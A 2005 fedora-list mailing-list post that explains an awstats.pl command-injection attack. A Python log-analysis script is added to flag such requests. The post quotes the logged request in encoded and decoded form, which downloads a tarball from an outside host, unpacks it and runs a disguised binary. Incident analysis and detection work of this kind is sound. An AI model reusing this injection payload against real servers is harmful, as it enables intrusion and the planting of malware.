Security Breach

Paul Howarth paul at city-fan.org
Fri Mar 4 17:58:22 UTC 2005


David Cary Hart wrote:
> On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
> 
>>>  "GET  
>>>/cgi-bin/awstats.pl? 
>>>configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 
>>>0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta 
>>>r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec 
>>>ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"

(snip)

>>Thank you for this report.
>>So you are saying that even with awstats 6.4 you got compromised as
>>Apache did execute the logged command and a trojan then started running
>>located in /tmp? If so, would you please be so kind and report that
>>issue to the awstats project guys as soon as possible?
> 
> 
> Alexander:
> 
> Could you explain the series of events? It's not clear - to me - how
> this resulted in a compromised machine.

Replace the URL-encoded characters and you get:

/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
mech crond;export PATH=;crond;echo e_exp;%00

So the attacker has tricked the script into executing a set of shell 
commands, which include changing directory to /tmp, downloading a 
tarball from a Romanian site, extracting that tarball and then executing 
a program from the downloaded and extracted tarball, after renaming it 
to "crond" in an effort to disguise it.

Paul.
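The decoding step Paul describes above, done programmatically over an access-log line, as an added example that is not part of the thread. The log line is reconstructed from the wrapped excerpt quoted earlier (the ">>>" quoting and line breaks removed); the client address and timestamp in front of it, the benign comparison line, and the function names are constructed for the example.

```python
"""URL-decode the query string of an awstats request from an Apache access
log and flag parameter values that contain shell metacharacters.
Added example for the fedora-list thread; not code from the thread."""
import re
from urllib.parse import unquote, urlsplit

# Reconstructed from the wrapped log excerpt quoted in the thread. The
# leading client address and timestamp are constructed (TEST-NET address);
# the request field itself is the one quoted on the list.
SAMPLE_LOG_LINE = (
    '192.0.2.10 - - [04/Mar/2005:17:00:00 +0000] "GET /cgi-bin/awstats.pl?'
    'configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20'
    'zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar'
    '%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3b'
    'echo%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"'
)

# Constructed benign request for comparison: an ordinary configdir path.
BENIGN_LOG_LINE = (
    '192.0.2.11 - - [04/Mar/2005:17:01:00 +0000] "GET /cgi-bin/awstats.pl?'
    'configdir=%2fetc%2fawstats&config=www HTTP/1.1" 200 12345 "-" "-"'
)

# Apache common/combined log format; referer and user agent are optional.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Characters that should never appear in a directory name handed to a CGI
# script: pipe, command separator, backtick, variable expansion, background.
SHELL_META = re.compile(r'[|;`$&]')


def parse_access_line(line):
    """Split one access-log line into its fields, or return None if it
    does not match the expected format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['query'] = parts.query
    return rec


def decode_query(query):
    """Decode a raw query string one parameter at a time. Splitting on '&'
    happens before percent-decoding, so an encoded %26 or %3b cannot
    create a new parameter boundary; each value is decoded exactly once,
    which is why %2500 comes out as the literal text %00."""
    params = {}
    if not query:
        return params
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params


def analyze(line):
    """Return (record, findings): one finding per query parameter whose
    decoded value carries shell metacharacters, with the value split into
    the individual commands an attacker would be trying to run."""
    rec = parse_access_line(line)
    if rec is None:
        return None, []
    findings = []
    for name, value in decode_query(rec['query']).items():
        if SHELL_META.search(value):
            # A leading '|' is the injection marker; the rest is a ';'
            # separated command list.
            body = value.lstrip('|')
            commands = [c.strip() for c in body.split(';') if c.strip()]
            findings.append({'param': name, 'decoded': value,
                             'commands': commands})
    return rec, findings


if __name__ == '__main__':
    for sample in (SAMPLE_LOG_LINE, BENIGN_LOG_LINE):
        rec, findings = analyze(sample)
        print(f"{rec['client']} {rec['method']} {rec['path']} "
              f"status={rec['status']} suspicious_params={len(findings)}")
        for f in findings:
            print(f"  {f['param']} = {f['decoded']}")
            for cmd in f['commands']:
                print(f"    -> {cmd}")
```

Running it prints the same decoded command list Paul reconstructed by hand; the HTTP status of 200 in the record is the detail worth noticing when grepping a log, since the request did not fail. The benign line produces no findings, so the metacharacter test can be applied to a whole log without flagging normal awstats traffic.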




More information about the fedora-list mailing list